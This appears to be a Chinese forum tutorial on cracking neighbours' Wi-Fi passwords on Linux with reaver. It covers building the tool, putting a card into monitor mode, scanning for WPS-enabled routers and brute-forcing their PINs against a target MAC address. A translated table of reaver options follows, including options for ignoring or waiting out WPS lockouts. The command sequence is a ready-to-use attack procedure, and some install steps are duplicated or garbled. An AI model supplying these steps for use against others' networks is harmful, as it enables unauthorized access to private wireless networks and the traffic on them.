在linux下使用reaver获取无线wifi密码的步骤
<p>需要工具:reaver<br />安装:<br /> 下载源码<br />从这个网址下载reaver源代码http://code.google.com/p/reaver-wps<br />wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz<br /> <br /> <br />解压<br />tar-xzvf reaver-1.4.tar.gz<br /> <br />安装必要的软件依赖库和工具<br />在您编译reaver前需要先安装pcaplib等工具,后面还需要aircrack-ng<br />sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev<br /> <br />编译和安装<br /> <br /><strong>配置和编译Reaver</strong><br /> <br />cd reaver-1.4<br />cd src<br />./configure<br />make<br />下载aircrack-ng源代码并编译<br />从Ubuntu12.04版本开始aircrack-ng不再被包含在版本软件仓库中,不过我们可以从网上下载它的源代码进行编译安装。如果aircrack-ng已经存在,则不必安装。./configure<br />make<br />sudo install<br />解压 tar -xzvf reaver-1.4.tar.gz<br /> <br /><strong>安装必要的软件依赖库和工具</strong><br /><br />在您编译 reaver前需要先安装 pcaplib等工具,后面还需要 aircrack-ng sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev<br /><br /><strong>编译和安装</strong><br /><br />配置和编译 Reaver<br />cd reaver-1.4 cd src ./configure make<br />安装 Reaver<br />sudo make install<br /><br />方法:<br /><br />1 输入:airmon-ng start wlan0 开启监 听模式 (屏幕显示 加载8187L驱动成功–一次就加载成功啊!)<br />2 输入:wash -i mon0 -C 查看所有开启WPS的无线路由 长时间无反应按Ctrl+C,结束进程,这时记下你要PJ的目标路由MAC.<br />3 输入:airodump-ng mon0 网卡以混杂模式扫描所有频道—并显示所有AP的信息(包括 AP的信号强度,ESSID,MAC,频道,加密方式,等等…..),按Ctrl+C,结束扫描.<br />注:如果你已知对方无线路由信息 第2,第3步 可省略!<br />4 输入:reaver -i mon0 -b MAC -a -S -vv 开始穷举pin码<br />注:随时可以按CTRL+C退出保存进程,下次按下光标控制键“上”键然后回车,进程可继续。<br />实战我输入了reaver -i mon0 -b MACD8:5D:4C:37:78:F6 -a -S -vv -d 0 ( 多加了 -d 0 加快速度 ),只见屏幕飞闪<br /><br /><strong>reaver 参数详解</strong><br /><br />必须参数<br /><br />-i, –interface=<wlan> Name of the monitor-mode interface to use<br />网卡的监视接口,通常是mon0<br />-b, –bssid=<mac> BSSID of the target AP<br />AP的MAC地址<br />Optional Arguments: 可选参数<br />-m, –mac=<mac> MAC of the host system<br />指定本机MAC地址<br />-e, –essid=<ssid> ESSID of the target AP<br />路由器的ESSID,一般不用指定<br />-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)<br />信号的频道,如果不指定会自动扫描<br />-o, –out-file=<file> Send output to a log file <br />输出日志文件<br />-s, –session=<file> Restore a previous session file<br />恢复进度文件<br />-C, –exec=<command> Execute the supplied command upon successful pin recovery<br />pin成功后执行命令<br />-D, –daemonize Daemonize reaver<br />设置reaver成Daemon<br />-a, –auto Auto detect the best advanced options for the target AP<br />对目标AP自动检测高级参数<br />-f, –fixed Disable channel hopping<br />禁止频道跳转<br />-5, –5ghz Use 5GHz 802.11 channels<br />使用5G频道<br />-v, –verbose Display non-critical warnings (-vv for more)<br />显示不重要警告信息 -vv 可以显示更多<br />-q, –quiet Only display critical messages<br />只显示关键信息<br />-h, –help Show help<br />显示帮助<br />Advanced Options:高级选项<br />-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin<br />使用指定的4位或者8位pin码<br />-d, –delay=<seconds> Set the delay between pin attempts <br />pin间延时,默认1秒<br />-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts <br />AP锁定WPS后等待时间<br />-g, –max-attempts=<num> Quit after num pin attempts<br />最大pin次数<br />Reaver 参数<br />—天天<br />-x, –fail-wait=<seconds> Set the time to sleep after 10 unexpected failures <br />10次意外失败后等待时间,默认0秒<br />-r, –recurring-delay=<x:y> Sleep for y seconds every x pin attempts<br />每x次pin后等待y秒<br />-t, –timeout=<seconds> Set the receive timeout period <br />收包超时,默认5秒<br />-T, –m57-timeout=<seconds> Set the M5/M7 timeout period <br />M5/M7超时,默认0.2秒<br />-A, –no-associate Do not associate with the AP (association must be done by another application)<br /> <br />不连入AP(连入过程必须有其他程序完成)<br />-N, –no-nacks Do not send NACK messages when out of order packets are received<br />不发送NACK信息(如果一直pin不动,可以尝试这个参数)<br />-S, –dh-small Use small DH keys to improve crack speed<br />使用小DH关键值提高速度(推荐使用)<br />-L, –ignore-locks Ignore locked state reported by the target AP<br />忽略目标AP报告的锁定状态<br />-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet<br />每当收到EAP失败包就终止WPS进程<br />-n, –nack Target AP always sends a NACK <br />对目标AP总是发送NACK,默认自动<br />-w, –win7 Mimic a Windows 7 registrar <br />模拟win7注册,默认关闭<br />Ps:影响到无线的因素很多,所以各参数之间的配合很重要,当然,最关键的还是取决于信号。<br />原理详细:<br />什么是PIN码?<br />印在无线路由器设备标签上的一组8位数字字符串,无线路由器管理界面中当然也会存在并可更改。<br />PIN码有什么用?<br />在无线网卡的配套管理软件(如TP-LINK的QSS软件)里输入无线路由器设备上的那8位数字字符串就可以成功登录该已被加密的无线路由器。</p>
頁:
[1]